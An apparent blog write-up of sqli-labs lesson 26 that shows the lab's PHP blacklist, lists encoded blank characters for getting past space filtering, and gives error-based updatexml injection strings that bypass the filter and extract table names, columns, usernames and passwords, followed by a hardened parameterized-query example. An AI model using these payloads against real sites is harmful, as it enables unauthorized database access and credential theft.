SQL injection less26 (filter spaces and comments, and use error injection without spaces)
2022-07-26 22:17:00 【Happy star】
function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);       // strip out OR (case-insensitive, single pass)
    $id = preg_replace('/and/i', "", $id);      // strip out AND (case-insensitive, single pass)
    $id = preg_replace('/[\/\*]/', "", $id);    // strip out every / and * (removes /* */ comments)
    $id = preg_replace('/[--]/', "", $id);      // strip out every - (removes -- comments)
    $id = preg_replace('/[#]/', "", $id);       // strip out #
    $id = preg_replace('/[\s]/', "", $id);      // strip out whitespace
    $id = preg_replace('/[\/\\\\]/', "", $id);  // strip out slashes and backslashes
    return $id;
}
Trying to bypass the space filter
Substitutes for the space character:
(1) MySQL blank characters: %09, %0A, %0B, %0D, %20, %0C, %A0, /**/
(2) Regex whitespace: %09, %0A, %0B, %0D, %20
%25 is the percent sign, so %25A0 is a blank character
%09: TAB (horizontal)
%0a: new line
%0c: new page (form feed)
%0d: carriage return
%0b: TAB (vertical)
%a0: space
Inline comments are often used to bypass space filters.
I tried this and found that the space filter could not be bypassed,
because on Windows some special characters cannot be used in place of spaces. On Linux they can, so you can try it on Linux.
Injection without spaces (error-based injection)
?id=1'||updatexml(1,concat(0x7e,(database())),1)||'1' ='1
?id=1'%26%26updatexml(1,concat('~~',database()),1)%26%26'
%26 is the URL encoding of &.
Because and must have a space before and after it, && is used instead.
However, && cannot be submitted to the server as-is, so its URL encoding %26%26 has to be entered.
Using || is fine too, and is better to use.
?id=1'%26%26updatexml(1,concat('~~',database()),1)%26%26'
?id=1'%26%26updatexml(1,concat('~~',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="security"))),1)%26%26'
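Note that each part of the statement is wrapped in parentheses, which gets around the need for spaces.
The parentheses () separate the parts of each query.
The doubled letters in infoorrmation_schema are there because blacklist() removes or only once, in a single pass, which leaves information_schema behind.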
?id=1'%26%26updatexml(1,concat("~~",(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema="security"%26%26table_name="users")),0)%26%26'
near 'LIMIT 0,1'
This problem has also come up in earlier error-based injections. It may be that the extra LIMIT 0,1 prevents the whole statement from being formed.
The problem could also be here: (table_schema="security"%26%26table_name="users")
?id=1'%26%26updatexml(1,concat("~~",(select(group_concat(username,passwoorrd))from(users))),0)%26%26'
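The blacklist above fails because it tries to clean hostile input rather than keep input out of the SQL text. As an added example (not code from sqli-labs or from the original post), here is a hardened lookup that allowlists the id, binds it as a parameter, and keeps database errors out of the response. The function names `make_db` and `find_user`, the sample row, and the in-memory SQLite database standing in for the lab's MySQL `users` table are assumptions made so the example runs offline.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the lab's `users` table (assumption: in-memory
// SQLite via PDO so the example runs offline; the lab itself uses MySQL).
function make_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    $pdo->exec("INSERT INTO users VALUES (1, 'alice', 'constructed-value')");
    return $pdo;
}

// Hardened lookup (hypothetical helper): validate the input shape, bind it
// as a typed parameter, and never echo database errors to the client.
function find_user(PDO $pdo, string $rawId): ?array
{
    // An id is digits only; anything else is rejected, not "cleaned".
    if (!preg_match('/\A[0-9]{1,9}\z/', $rawId)) {
        return null;
    }
    try {
        $stmt = $pdo->prepare('SELECT id, username FROM users WHERE id = :id LIMIT 1');
        $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        // Log server-side only: error-based extraction depends on the
        // database error message being returned in the HTTP response.
        error_log('user lookup failed: ' . $e->getMessage());
        return null;
    }
}

$pdo = make_db();
// Constructed inputs: a normal id, and the first error-injection string from this page.
$inputs = ['1', "1'||updatexml(1,concat(0x7e,(database())),1)||'1' ='1"];
foreach ($inputs as $in) {
    $row = find_user($pdo, $in);
    echo str_pad(substr($in, 0, 24), 26), $row ? 'found ' . $row['username'] : 'rejected', PHP_EOL;
}
```

The numeric id returns its row, while the injection string is rejected before any SQL is built. Even if the allowlist check were dropped, the bound parameter would be compared as a value and never parsed as SQL.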
https://blog.csdn.net/weixin_43901998/article/details/107340272